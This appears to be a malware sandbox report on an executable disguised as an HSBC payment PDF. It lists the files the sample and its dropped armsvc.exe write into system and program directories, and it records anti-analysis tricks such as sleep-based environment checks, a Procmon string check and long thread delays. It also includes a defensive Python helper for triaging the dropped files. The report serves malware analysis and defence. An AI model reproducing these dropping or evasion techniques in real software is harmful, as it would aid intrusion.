              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File created:
  C:\Windows\System32\AppVClient.exe
  C:\Windows\System32\alg.exe

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File created:
  C:\Windows\System32\snmptrap.exe
  C:\Windows\System32\Spectrum.exe
  C:\Windows\System32\Locator.exe
  C:\Windows\System32\AgentService.exe
  C:\Windows\System32\VSSVC.exe
  C:\Windows\System32\wbengine.exe
  C:\Windows\System32\wbem\WmiApSrv.exe
  C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
  C:\Windows\System32\SearchIndexer.exe
  C:\Windows\System32\FXSSVC.exe
  C:\Windows\System32\TieringEngineService.exe
  C:\Windows\System32\vds.exe
  C:\Windows\System32\OpenSSH\ssh-agent.exe
  C:\Windows\SysWOW64\perfhost.exe
  C:\Windows\System32\msiexec.exe
  C:\Windows\System32\SensorDataService.exe
  C:\Windows\System32\msdtc.exe
  C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
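
The rows above are the raw evidence for the drop chain: the sample writes armsvc.exe into the Adobe ARM directory and two binaries into System32, and armsvc.exe then writes executables across Program Files and the system directories. As an added triage helper (not part of Joe Sandbox or of this report), the Python below parses rows in the exported text form `Source: <writer>File created: <path>Jump to dropped file`, collapses repeated rows, groups paths by writing process, reconstructs which writers were themselves dropped by an earlier process, and flags PE writes into Program Files or the system directories. The protected-prefix list, the installer allow-list and the sample rows are constructed for the example; the rows reuse paths from this report plus one constructed msiexec.exe row, added to show that a writer whose own binary was overwritten must not be trusted by name.

```python
"""Triage helper for 'File created' rows from a Joe Sandbox text export.

Added example, not part of Joe Sandbox. Row shape handled:
    Source: <writer>File created: <path>Jump to dropped file
(the trailing link text and the missing space before 'File created:' are how
the export renders the table cells; both are optional for the parser).
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

ROW_RE = re.compile(
    r"^\s*Source:\s*(?P<writer>.+?)\s*File created:\s*(?P<path>.+?)"
    r"\s*(?:Jump to dropped file)?\s*$"
)

# Heuristic lists chosen for this example: locations where a PE write by
# anything other than a servicing/installer process deserves a look, and the
# installer names allowed to write there (only while their own binary is
# untouched in the report).
PROTECTED_PREFIXES = (
    "C:\\Windows\\System32\\",
    "C:\\Windows\\SysWOW64\\",
    "C:\\Program Files\\",
    "C:\\Program Files (x86)\\",
)
PE_SUFFIXES = {".exe", ".dll", ".sys"}
INSTALLER_NAMES = {"msiexec.exe", "trustedinstaller.exe", "tiworker.exe"}


def parse_rows(text):
    """Yield (writer, path) for every row matching ROW_RE; other lines are skipped."""
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            yield m.group("writer"), m.group("path")


def is_pe(path):
    """True for the executable extensions in PE_SUFFIXES (directories have no suffix)."""
    return PureWindowsPath(path).suffix.lower() in PE_SUFFIXES


def is_protected(path):
    p = path.lower()
    return any(p.startswith(prefix.lower()) for prefix in PROTECTED_PREFIXES)


def group_by_writer(text):
    """Map each writing process to the set of paths it created (duplicate rows collapse)."""
    by_writer = defaultdict(set)
    for writer, path in parse_rows(text):
        by_writer[writer].add(path)
    return dict(by_writer)


def dropped_writers(by_writer):
    """Return {writer: creator} for writers whose own path was created in the
    report, i.e. second-stage binaries dropped by an earlier process."""
    created_by = {}
    for creator, paths in by_writer.items():
        for path in paths:
            created_by[path.lower()] = creator
    return {w: created_by[w.lower()] for w in by_writer if w.lower() in created_by}


def triage(text):
    """Return (by_writer, findings). A finding is a (writer, path) pair where a PE
    landed in a protected location from a writer that is not a pristine
    installer; a writer whose own file was (over)written in the report is never
    trusted, whatever its name."""
    by_writer = group_by_writer(text)
    dropped = dropped_writers(by_writer)
    findings = []
    for writer, paths in by_writer.items():
        name = PureWindowsPath(writer).name.lower()
        if name in INSTALLER_NAMES and writer not in dropped:
            continue
        for path in sorted(paths):
            if is_pe(path) and is_protected(path):
                findings.append((writer, path))
    return by_writer, findings


# Constructed input: rows copied from this report plus one constructed row in
# which the (already overwritten) msiexec.exe writes a further executable.
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
Source: C:\Windows\System32\TieringEngineService.exeFile created: C:\System Volume Information\Heat\
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
"""

if __name__ == "__main__":
    by_writer, findings = triage(SAMPLE_ROWS)
    for writer, creator in dropped_writers(by_writer).items():
        print(f"dropped writer: {writer}  <- created by {creator}")
    for writer, path in findings:
        print(f"FLAG {PureWindowsPath(writer).name} wrote {path}")
```

Run against the full export, the chain output makes the staging explicit (sample, then armsvc.exe, then the System32 services it overwrote), and the findings list is the set of paths whose on-disk binaries need signature and hash verification on any host that ran this sample. Paths without a PE suffix, such as the System Volume Information directory, are grouped but not flagged.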

              Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\TieringEngineService.exe
File created: C:\System Volume Information\Heat\
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Code function 0_2_004048D7: GetForegroundWindow, FindWindowW, IsIconic, ShowWindow, SetForegroundWindow, GetWindowThreadProcessId, GetWindowThreadProcessId, GetCurrentThreadId, GetWindowThreadProcessId, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput, SetForegroundWindow, MapVirtualKeyW, MapVirtualKeyW, keybd_event, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, SetForegroundWindow, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Code function 0_2_00485376: IsWindowVisible, IsWindowEnabled, GetForegroundWindow, IsIconic, IsZoomed
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Code function 0_2_00423187: EncodePointer, __initp_misc_winsig, GetModuleHandleW, GetProcAddress (34 consecutive calls)
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 11_2_00995346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 11_2_00995346
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 12_2_02285346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 12_2_02285346
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Code function: 14_2_00B95346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 14_2_00B95346
              Source: C:\Windows\System32\Spectrum.exe Code function: 20_2_00725346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 20_2_00725346
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exe Code function: 22_2_00D15346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 22_2_00D15346
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Evasive API call chain: GetComputerName,DecisionNodes,Sleep graph_0-180369
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Evasive API call chain: GetVolumeInformation,DecisionNodes,Sleep graph_0-180368
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe API/Special instruction interceptor: Address: AC250C
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1312813211.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1310393083.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346748360.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1312666727.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1311236894.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1312018188.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1310508086.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE=
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599578
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599453
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599343
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599234
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599124
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599015
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598906
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598796
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598687
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598565
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598437
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598328
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598218
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598109
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597768
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597640
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597531
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597422
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597307
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597203
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596704
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596568
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596349
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596093
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595923
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595779
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595671
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595561
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595453
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595343
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595218
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595109
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594888
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594781
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594672
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594562
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594453
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594343
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594234
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594125
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594015
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593906
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593796
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593683
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593524
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593354
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593234
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593086
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592959
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592718
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592387
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2903
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 6913
              Source: C:\Windows\System32\msdtc.exe Window / User API: threadDelayed 483
